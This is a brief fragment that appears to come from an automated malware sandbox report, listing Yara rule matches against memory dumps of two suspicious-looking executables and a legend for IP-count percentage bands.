Source: Yara match File source: 00000000.00000002.1673501773.000000000405D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 9nvo2o410p.exe PID: 8, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 9nvo2o410p.exe PID: 7436, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: FAwLPzxPWWF.exe PID: 7836, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs